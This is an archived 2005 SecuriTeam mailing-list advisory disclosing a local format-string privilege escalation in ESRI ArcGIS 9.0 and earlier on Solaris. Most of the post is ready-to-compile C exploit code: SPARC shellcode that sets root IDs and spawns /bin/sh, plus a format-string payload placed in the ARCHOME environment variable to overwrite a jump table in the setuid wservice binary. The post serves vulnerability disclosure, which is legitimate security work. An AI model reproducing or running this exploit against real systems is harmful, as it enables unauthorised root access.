[EXPL] ArcGIS Local Format String Exploit
From: SecuriTeam (support_at_securiteam.com)
Date: 05/01/05
- Previous message: SecuriTeam: "[NEWS] Multiple Privilege Escalation Via DOM Property Overrides in Mozilla Suite, Firefox and Netscape"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 1 May 2005 17:13:05 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ArcGIS Local Format String Exploit
------------------------------------------------------------------------
SUMMARY
" <http://www.esri.com/software/arcgis/> ArcGIS is an integrated
collection of GIS software products for building a complete GIS for your
organization. The ArcGIS framework enables you to deploy GIS functionality
and business logic wherever it is needed in desktops, servers (including
the Web), or mobile devices. This architecture, coupled with the
geodatabase, gives you the tools to assemble intelligent geographic
information systems."
A format string vulnerability in ArcGIS allows local code execution with
root privileges.
DETAILS
Vulnerable Systems:
* ESRI Arcgis version 9.0 and prior
Exploit:
/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
** Bug found by Kevin Finisterre <kf@digitalmunition.com>
** Exploit by John H. <johnh@digitalmunition.com>
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP "\xa2\x1c\x40\x11"
int iType;
struct
{
unsigned long retloc;
unsigned long retaddr;
char *type;
}targets[] =
{
/* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
0003a234 d thr_jmp_table
*/
{0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
{0x41424344,0x41424344,"DEBUG"},
},v;
//shellcode taken from netric
char shellcode[] =
"55"
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
// setreuid(0,0);
"\x90\x1d\x80\x16" // xor %l6, %l6, %o0
"\x92\x1d\x80\x16" // xor %l6, %l6, %o1
"\x82\x10\x20\xca" // mov 0xca, %g1
"\x91\xd0\x20\x08" // ta 8
"\x90\x1d\x80\x16" // xor %l6, %l6, %o0
"\x92\x1d\x80\x16" // xor %l6, %l6, %o1
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\xcb" // mov 0x2e, %g1
"\x91\xd0\x20\x08" // ta 8 [setregid(0,0)]
"\x21\x0b\xd9\x19" // sethi %hi(0x2f646400), %l0
"\xa0\x14\x21\x76" // or %l0, 0x176, %l0
"\x23\x0b\xdd\x1d" // sethi %hi(0x2f747400), %l1
"\xa2\x14\x60\x79" // or %l1, 0x79, %l1
"\xe0\x3b\xbf\xf8" // std %l0, [ %sp - 0x8 ]
"\x90\x23\xa0\x08" // sub %sp, 8, %o0
"\x92\x1b\x80\x0e" // xor %sp, %sp, %o1
"\x82\x10\x20\x05" // mov 0x05, %g1
"\x91\xd0\x20\x08" // ta 8 [open("/dev/tty",RD_ONLY)]
"\x90\x10\x20\x02" // mov 0x02, %o0
"\x82\x10\x20\x29" // mov 0x29, %g1
"\x91\xd0\x20\x08" // ta 8 [dup(2)]
"\x21\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l0
"\xa0\x14\x21\x6e" // or %l0, 0x16e, %l0
"\x23\x0b\xcb\xdc" // sethi %hi(0x2f2f7000), %l1
"\xa2\x14\x63\x68" // or %l1, 0x368, %l1
"\xe0\x3b\xbf\xf0" // std %l0, [ %sp - 0x10 ]
"\xc0\x23\xbf\xf8" // clr [ %sp - 0x8 ]
"\x90\x23\xa0\x10" // sub %sp, 0x10, %o0
"\xc0\x23\xbf\xec" // clr [ %sp - 0x14 ]
"\xd0\x23\xbf\xe8" // st %o0, [ %sp - 0x18 ]
"\x92\x23\xa0\x18" // sub %sp, 0x18, %o1
"\x94\x22\x80\x0a" // sub %o2, %o2, %o2
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x08" // ta 8 [execve("/bin/sh","/bin/sh",NULL)]
"\x82\x10\x20\x01" // mov 0x01, %g1
"\x91\xd0\x20\x08" // ta 8 [exit(?)]
"\x10\xbf\xff\xdf" // b shellcode
"\x90\x1d\x80\x16"; // or %o1, %o1, %o1
/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
*ptr++ = (char) (value >> 24) & 0xff;
*ptr++ = (char) (value >> 16) & 0xff;
*ptr++ = (char) (value >> 8) & 0xff;
*ptr++ = (char) (value >> 0) & 0xff;
return ptr;
}
/* main */
int main(int argc, char **argv)
{
unsigned long retaddr;
unsigned long retloc;
int offset = 23;
int dump_fmt=129;
int al = 1;
int i=0;
int x=0;
int c;
unsigned long hi,lo;
static unsigned long shift0,shift1;
char buf[9000];
char *args[24];
char *env[6];
char *ptr;
char padding[64];
char padding1[64];
char buf2[9000];
if (argc < 3) {
usage (argv[0]);
return -1;
}
while((c = getopt(argc, argv, "h:t:")) != EOF) {
switch(c) {
case 'h':
usage (argv[0]);
return 0;
case 't':
iType = atoi (optarg);
break;
default:
usage (argv[0]);
return 0;
}
}
if (argc < 2) { usage(argv[0]); exit(1); }
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return 0;
}
env[0] = shellcode;
env[1] = buf2;
env[2] = NULL;
args[0] = VULPROG;
args[1] = NULL;
retloc = targets[iType].retloc;
retaddr = targets[iType].retaddr;
hi = (retaddr >> 16) & 0xffff;
lo = (retaddr >> 0) & 0xffff;
shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
shift1 = (0x10000 + lo) - hi;
memset(buf,0x00,sizeof(buf));
memset(buf2,0x00,sizeof(buf2));
ptr = buf;
for (i = 0; i < al; i++) {
*ptr++ = 0x41;
}
ptr = putLong (ptr, 0x41414141);
ptr = putLong (ptr, retloc);
ptr = putLong (ptr, 0x42424242);
ptr = putLong (ptr, retloc+2);
for (i = 0 ; i < dump_fmt; i ++) {
memcpy(ptr, "%.8x", 4);
ptr = ptr + 4;
}
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift0);
strcat(ptr,"lx%hn");
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift1);
strcat(ptr,"lx%hn");
strcat(buf2,"ARCHOME=");
memcpy(buf2+strlen(buf2),buf,strlen(buf));
execve (args[0], args, env);
perror ("execve");
return 0;
}
int usage(char *p)
{
int i;
printf( "Arcgis local root format string exploit\r\n");
printf( "Usage: %s <-t target>\n",p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("%d\t%s\n", i, targets[i].type);
}
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:kf@digitalmunition.com>
Kevin Finisterre.
The information has been provided by <mailto:johnh@digitalmunition.com>
John H..
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Multiple Privilege Escalation Via DOM Property Overrides in Mozilla Suite, Firefox and Netscape"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
